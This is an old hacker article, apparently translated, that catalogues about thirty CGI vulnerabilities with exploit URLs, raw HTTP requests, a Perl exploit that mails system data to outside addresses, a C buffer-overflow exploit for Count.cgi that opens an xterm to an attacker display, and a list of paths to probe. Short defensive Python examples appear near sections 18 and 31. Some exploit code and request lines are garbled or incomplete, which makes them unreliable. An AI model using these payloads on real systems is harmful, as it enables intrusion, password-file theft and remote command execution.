1. PHF Vulnerability
The PHF hole is probably the most classic one; almost every article on the subject covers it. It lets you execute commands on the server, for example to display /etc/passwd:
lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
But can it still be found anywhere?
2. php.cgi 2.0beta10 or earlier
Can read any file that the user nobody has permission to read.
lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd
php.cgi version 2.1 can only read shtml files. As for the password file, be aware that it may be in
/etc/master.passwd
/etc/security/passwd
and so on.
3. whois_raw.cgi
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0a/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
4. faxsurvey
lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
5. textcounter.pl
If textcounter.pl is present on the server, anyone can execute commands with the privileges of the HTTP daemon.
#!/usr/bin/perl
$URL = 'http://dtp.kappa.ro/a/test.shtml'; # please _do_ _modify_ this
$EMAIL = 'pdoru@pop3.kappa.ro,root'; # please _do_ _modify_ this
if ($ARGV[0]) { $CMD = $ARGV[0]; } else {
$CMD = "(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
}
$text = "${URL}/;IFS=\8;${CMD};echo|"; $text =~ s/ /\$\{IFS\}/g; #print "$text\n";
system({"wget"} "wget", $text, "-o/dev/null");
system({"wget"} "wget", $text, "-o/dev/null");
#system({"lynx"} "lynx", $text); # if wget is not available, lynx can be used instead
#system({"lynx"} "lynx", $text);
6. info2www vulnerabilities in some versions (1.1)
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail Jami asswd|)'
$
You have new mail.
$
I don't quite understand this one. :(
7. pfdispaly.cgi
lynx -source \
'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
pfdispaly.cgi has another hole that allows command execution:
lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
Or
lynx -dump \
http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'
8. wrap
lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc
9. www-sql
Lets you read some restricted pages. For example, entering
http://your.server/protected/something.html
in your browser prompts for an account name and password, while going through www-sql does not:
http://your.server/cgi-bin/www-sql/protected/something.html
10. view-source
lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd
11. campas
lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a
12. webgais
telnet www.victim.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
query=';mail+drazvan\@pop3.kappa.roparagraph
13. websendmail
telnet www.victim.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.orgubject=a&content=a
14. handler
telnet www.victim.com 80
GET /cgi-bin/handler/useless_shit;cat/etc/passwd|?data=download HTTP/1.0
Or
GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=download
Or
GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=download
Note that what follows cat is a TAB character rather than a space. The server reports that useless_shit cannot be opened, but still executes the command that follows.
15. test-cgi
lynx http://www.victim.com/cgi-bin/test-cgi?\whatever
CGI/1.0 test script:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = victim.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
Get some HTTP directories
lynx http://www.victim.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
This trick doesn't seem to work. :(
lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
You can also try these:
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *
16. On some BSD Apache installations you can:
lynx http://www.victim.com/root/etc/passwd
lynx http://www.victim.com/~root/etc/passwd
17. htmlscript
lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd
18. jj.c
The demo CGI program jj.c calls /bin/mail without filtering user
input, so any program based on jj.c could potentially be exploited by
simply adding a followed by a Unix command. It may require a
password, but two known passwords include Httpdrocks and sdgrocks. If
you can retrieve a copy of the compiled program, running strings on it
would probably reveal the password.
Do a web search on jj.c to get a copy and study the code yourself if
you have more questions.
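The flaw described for jj.c, and behind the %0a requests to phf, campas and whois_raw.cgi earlier in this list, is a form value reaching a shell command line unfiltered. The following is an added example, not code from jj.c or from any program named here; the function names, the "feedback" subject and the recipient pattern are assumptions. It contrasts the unsafe string-building pattern with a handler that validates the whole decoded value and passes it as one argument, with no shell involved.

```python
import re
from urllib.parse import unquote

# Allowlist for a mail recipient (assumed policy: plain local-part@domain,
# starting with an alphanumeric so the value can never look like an option).
RECIPIENT_RE = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._+-]{0,63}@[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def unsafe_command_line(raw_value):
    """Vulnerable pattern: the decoded form value is pasted into a string
    that would be handed to /bin/sh. Built for inspection, never executed."""
    return "/bin/mail -s feedback " + unquote(raw_value)


def commands_seen_by_shell(command_line):
    """Simplified model of sh parsing: newline and ';' each end a command."""
    parts = re.split(r"[\n;]", command_line)
    return [part.strip() for part in parts if part.strip()]


def safe_argv(raw_value):
    """Hardened pattern: validate the whole decoded value, then build an
    argument vector for an exec-style call (list form, no shell)."""
    value = unquote(raw_value)
    # fullmatch rather than match with '$': '$' also matches just before a
    # trailing newline, so "user@host\n" would slip through.
    if not RECIPIENT_RE.fullmatch(value):
        raise ValueError("recipient rejected: %r" % value)
    return ["/bin/mail", "-s", "feedback", value]


def demo():
    injected = "x%0a/bin/cat%20/etc/passwd"  # value from the PHF request above
    result = {"shell_sees": commands_seen_by_shell(unsafe_command_line(injected))}
    try:
        safe_argv(injected)
        result["hardened"] = "accepted"
    except ValueError:
        result["hardened"] = "rejected"
    return result


if __name__ == "__main__":
    print(demo())
```

The list returned by safe_argv is meant to be passed to an exec-style call such as subprocess.run(argv, input=body), so the value stays a single argument whatever it contains.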
19. FrontPage Extensions
If you read http://www.victim.com/_vti_inf.html, you get the FP extensions version
and the path it has on the server. There are also some password files, such as:
http://www.victim.com/_vti_pvt/service.pwd
http://www.victim.com/_vti_pvt/users.pwd
http://www.victim.com/_vti_pvt/authors.pwd
http://www.victim.com/_vti_pvt/administrators.pwd
20. Freestats.com CGI
I have never come across this one and feel some parts must not be mistranslated, so the English is pasted directly.
John Carlton found the following. He developed an exploit for the
free web stats services offered at freestats.com, and supplied the
webmaster with proper code to patch the bug.
Start an account with freestats.com, and log in. Click on the
area that says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER
INFO". This will call up a file called edit.pl with your user #
and password included in it. Save this file to your hard disk and
open it with Notepad. The only form
Hidden attribute on the form element of your account number.
Change this from
*input type=hidden name=account value=your#*
to
*input type=text name=account value=""*
Save your page and load it into your browser. There will now be a
text input box where the hidden element was before. Simply type a
# in and push the 'Click here to update user profile' and all the
information that appears on your screen has now been written to
that user's profile.
But that isn't the worst of it. By using frames (2 frames, one to
hold this page you just made, and one as a target for the form
submission) you could change the password on all of their accounts
with a simple JavaScript function.
Deep inside the web site authors still have the good old "edit.pl"
script. It takes some time to reach it (unlike the path described)
but you can reach it directly at:
http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=
21. Vulnerability in Glimpse HTTP
telnet target.machine.com 80
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor\@dhp.com\md;echo
HTTP/1.0
22. count.cgi
This program is only valid for the following versions of COUNT.CGI 24:
/*### count.c ########################################################*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
/* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *, long, char *);
/* Constants */
char shell[] =
"/usr/x11r6/bin/xterm0-ut0-display0";
char endpad[] =
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";
int main(int argc, char *argv[]) {
char *shellcode = NULL;
int cnt, ver, retcount, dispnum, dotquads[4], offset;
unsigned long sp;
char dispname[255];
char *host;
offset = sp = cnt = ver = 0;
fprintf(stderr, "\t%s-gus\n", argv[0]);
if (argc < 3) usage(argv[0]);
/* parse -h host, -d display, -v version, -o offset */
while ((cnt = getopt(argc, argv, "h:d:v:o:")) != EOF) {
switch (cnt) {
case 'h':
host = optarg;
break;
case 'd':
{
retcount = sscanf(optarg, "%d.%d.%d.%d:%d",
&dotquads[0],
&dotquads[1],
&dotquads[2],
&dotquads[3], &dispnum);
if (retcount != 5) usage(argv[0]);
sprintf(dispname, "%03d.%03d.%03d.%03d:%01d",
dotquads[0], dotquads[1], dotquads[2], dotquads[3], dispnum);
shellcode = malloc(strlen((char *)optarg) + strlen(shell) + strlen(endpad));
sprintf(shellcode, "%s%s%s", shell, dispname, endpad);
}
break;
case 'v':
ver = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
sp = offset + getsp(ver);
(void)doit(host, sp, shellcode);
exit(0);
}
unsigned long getsp(int ver) {
/* Get the stack pointer we should be using. YMMV. If it does not work,
try using -o X, where X is between -1500 and 1500 */
unsigned long sp = 0;
if (ver == ) sp = 0xbfffea50;
if (ver == ) sp = 0xbfffea50;
if (ver == ) sp = 0xbfffeab4;
if (ver == ) sp = 0xbfffee38; /* Dunno about this one */
if (sp == 0) {
fprintf(stderr, "I don't have an SP for version try using the -o option.\n");
fprintf(stderr, "versions above are patched for this bug.\n");
exit(1);
} else {
return sp;
}
}
int usage(char *name) {
fprintf(stderr, "\tUsage: %s -h host -d -v [-o]\n", name);
fprintf(stderr, "\te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22\n", name);
exit(1);
}
int openhost(char *host, int port) {
int sock;
struct hostent *he;
struct sockaddr_in sa;
he = gethostbyname(host);
if (he == NULL) {
perror("Bad hostname\n");
exit(-1);
}
memcpy(&sa.sin_addr, he->h_addr, he->h_length);
sa.sin_port = htons(port);
sa.sin_family = AF_INET;
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) {
perror("Cannot open socket");
exit(-1);
}
bzero(&sa.sin_zero, sizeof(sa.sin_zero));
if (connect(sock, (struct sockaddr *)&sa, sizeof sa) < 0) {
perror("Cannot connect to host");
exit(-1);
}
return (sock);
}
void doit(char *host, long sp, char *shellcode) {
int cnt, sock;
char qs[7000];
int bufsize = 16;
char buf[bufsize];
char chain[] = "user=a";
bzero(buf, bufsize);
/* fill the query string with the little-endian bytes of sp */
for (cnt = 0; cnt < 4104; cnt += 4) {
qs[cnt+0] = sp & 0x000000ff;
qs[cnt+1] = (sp & 0x0000ff00) >> 8;
qs[cnt+2] = (sp & 0x00ff0000) >> 16;
qs[cnt+3] = (sp & 0xff000000) >> 24;
}
strcpy(qs, chain);
qs[strlen(chain)] = 0x90;
/* seven more copies of sp at offsets 4104..4131 (written out one byte
per line in the original listing) */
for (cnt = 4104; cnt < 4132; cnt += 4) {
qs[cnt+0] = sp & 0x000000ff;
qs[cnt+1] = (sp & 0x0000ff00) >> 8;
qs[cnt+2] = (sp & 0x00ff0000) >> 16;
qs[cnt+3] = (sp & 0xff000000) >> 24;
}
strcpy((char *)&qs[4132], shellcode);
sock = openhost(host, 80);
write(sock, "GET /cgi-bin/Count.cgi?", 23);
write(sock, qs, strlen(qs));
write(sock, " HTTP/1.0\n", 10);
write(sock, "User-Agent: ", 12);
write(sock, qs, strlen(qs));
write(sock, "\n\n", 2);
sleep(1);
/* printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0\nUser-Agent: %s\n\n", qs, qs); */
/*
setenv("HTTP_USER_AGENT", qs, 1);
setenv("QUERY_STRING", qs, 1);
system("./Count.cgi");
*/
}
Viewing images with Count.cgi:
http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=../../../../../../path_to_gif/file.gif
23. finger.cgi
lynx http://www.victim.com/cgi-bin/finger?@localhost
Gets the names of the users logged in to the host.
24. man.sh
Robert Moniot found the following. The May 1998 issue of SysAdmin
Magazine contains an article, "Web-Enabled Man Pages", which
includes source code for a very nice CGI script named man.sh to feed
man pages to a Web browser. The hypertext links to other man
pages are an especially attractive feature.
Unfortunately, this script is vulnerable to attack. Essentially,
anyone who can execute the CGI thru their Web browser can run any
system commands with the user ID of the Web server and obtain the
output from them in a Web page.
25. formhandler.cgi
Add it to the form.
/etc/passwd then arrives in your mailbox.
26. JFS
I believe everyone has read the article "JFS intrusion Pcweek-linux Mainframe Detailed process"; he used the Photoads
CGI module to break into the host. I have not actually tried the attack; my understanding from reading the article is this.
First:
lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?AdNum=31
337&action=done&country=lala&city=lele&state=a&email=lala@hjere.com&name=%0a
1111111111111111111111111111111111111111 111111111111111111111111111&phone=1
1&subject=la&password=0&citystphone=0&renewed=0 "
This creates a new ad whose value bypasses the later $AdNum check.
lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?file=a.jp
g&adnum=11111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111&datafile=1&password=0&fil
e_content=%00%00%00%00%00%00%00%00%00%00%00%00%00&file_name=/lala/\../../../
../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif'
This creates or overwrites any file that the user nobody has permission to write.
I do not know whether this is right; I cannot find the to_url script in its zip package. Does anyone know about it?
27. Backdoors
Some versions of cgichk.c now check for the trojans unlg1.1 and rwwwshell.pl.
The former was written by UNLG, and I have not seen its source code; the other was written by THC, and Packetstorm has the source code of its version 1.6.
28. visadmin.exe
http://omni.server/cgi-bin/visadmin.exe?user=guest
This request keeps writing to the server's hard drive until it is full.
29. campas
> telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
.... Now you know what to do :P
30. webgais
query=';mail+foo@somewhere.net
telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)
query=';mail+drazvan\@pop3.kappa.roparagraph
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.orgubject=a
&content=a
31. wrap
http://sgi.victim/cgi-bin/wrap?/../../../../../etc
Lists the files in the /etc directory.
Below are the names of all the CGI programs that may contain vulnerabilities. More vulnerabilities are still being collected and collated;
your criticism and advice are sincerely welcome.
/cgi-bin/rwwwshell.pl
/cgi-bin/phf
/cgi-bin/count.cgi
/cgi-bin/test.cgi
/cgi-bin/nph-test-cgi
/cgi-bin/nph-publish
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdisplay.cgi
/cgi-bin/perl.exe
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/glimpse
/cgi-bin/man.sh
/cgi-bin/at-admin.cgi
/scripts/no-such-file.pl
/_vti_bin/shtml.dll
/_vti_inf.html
/_vti_pvt/administrators.pwd
/_vti_pvt/users.pwd
/msadc/samples/selector/showcode.asp
/scripts/iisadmin/ism.dll?http/dir
/adsamples/config/site.csc
/main.asp%81
/advworks/equipment/catalog_type.asp?
/cgi-bin/input.bat?|dir..\..\windows
/index.asp::$DATA
/cgi-bin/visadmin.exe?user=guest
/?PageServices
/ss.cfg
/cgi-bin/get32.exe|echo%20>c:\file.txt
/cgi-bin/cachemgr.cgi
/cgi-bin/pfdispaly.cgi?/../../../../etc/motd
/domcfg.nsf
/today.nsf
/names.nsf
/catalog.nsf
/log.nsf
/domlog.nsf
/cgi-bin/at-generate.cgi
/secure/.wwwacl
/secure/.htaccess
/samples/search/webhits.exe
/scripts/srchadm/admin.idq
/cgi-bin/dumpenv.pl
Adminlogin? Rcpage=/sysadmin/index.stm/c:/program
/getdrvrs.exe
/test/test.cgi
/scripts/submit.cgi
/users/scripts/submit.cgi
/ncl_items.html?subject=2097
/cgi-bin/filemail.pl
/cgi-bin/maillist.pl
/cgi-bin/jj
/cgi-bin/info2www
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/bnbform.cgi
/cgi-bin/survey.cgi
/cgi-bin/anyform2
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/guestbook.cgi
/cgi-bin/edit.pl
/cgi-bin/perlshop.cgi
/_vti_inf.html
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/cgi-win/uploader.exe
/../../config.sys
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/aexp4b.htr
/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\winnt\repair\sam._
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/openfile.cfm
/getfile.cfm?Ft=text&fst=plain&filepath=c:\winnt\repair\sam._
/cfide/administrator/startstop.html
/cgi-bin/wwwboard.pl
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/cgi-dos/args.bat
/cgi-win/uploader.exe
/cgi-bin/rguest.exe
/cgi-bin/wguest.exe
/scripts/issadmin/bdir.htr
/scripts/cgimail.exe
/scripts/tools/newdsn.exe
/scripts/fpcount.exe
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/sendmail.cfm
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/msads/samples/selector/showcode.asp
/search97.vts
/carbo.dll
/cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd
/doc
/.html/............./config.sys
/....../
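
From the defender's side, the request strings and script paths collected above double as log signatures. The following is an added example, not part of the original article; the function names, the reason labels and the log lines are constructed for illustration. It scans Common Log Format lines for requests to a few of the listed scripts and for the encoded-newline, traversal and shell-metacharacter markers that the requests above rely on.

```python
import re
from urllib.parse import unquote

# Script paths copied from the list above; extend with the remaining entries.
WATCHED_PATHS = (
    "/cgi-bin/phf", "/cgi-bin/php.cgi", "/cgi-bin/whois_raw.cgi",
    "/cgi-bin/faxsurvey", "/cgi-bin/campas", "/cgi-bin/handler",
    "/cgi-bin/view-source", "/cgi-bin/htmlscript", "/cgi-bin/wrap",
    "/cgi-bin/pfdispaly.cgi", "/cgi-bin/test-cgi", "/cgi-bin/nph-test-cgi",
)

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*?)(?: HTTP/[\d.]+)?" (\d{3}) ')

# Constructed sample log (documentation addresses, made-up timestamps).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /index.html HTTP/1.0" 200 1043
192.0.2.77 - - [01/Jan/2000:10:00:05 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 512
192.0.2.77 - - [01/Jan/2000:10:00:09 +0000] "GET /cgi-bin/view-source?../../../../../../../etc/passwd HTTP/1.0" 404 210
192.0.2.77 - - [01/Jan/2000:10:00:12 +0000] "GET /cgi-bin/test-cgi?* HTTP/1.0" 200 640
192.0.2.31 - - [01/Jan/2000:10:01:00 +0000] "GET /cgi-bin/search?q=a%3Bb HTTP/1.0" 200 88
"""


def classify(target):
    """Return the reasons a request target looks like one of the probes."""
    path = unquote(target.split("?", 1)[0])
    decoded = unquote(target)  # decode once, as the CGI would see it
    reasons = []
    if any(path == p or path.startswith(p + "/") for p in WATCHED_PATHS):
        reasons.append("known-cgi")
    if "\n" in decoded or "\r" in decoded:
        reasons.append("encoded-newline")
    if "../" in decoded:
        reasons.append("traversal")
    if re.search(r"[;|`]", decoded):
        reasons.append("shell-metachar")
    return reasons


def scan(log_text):
    """Yield (client, status, target, reasons) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        client, _method, target, status = match.groups()
        reasons = classify(target)
        if reasons:
            hits.append((client, int(status), target, reasons))
    return hits


if __name__ == "__main__":
    for client, status, target, reasons in scan(SAMPLE_LOG):
        print(client, status, ",".join(reasons), target)
```

A hit that combines known-cgi with another marker and a 200 status is the one to follow up first; the last sample line shows that a metacharacter alone on an unlisted script is a much weaker signal.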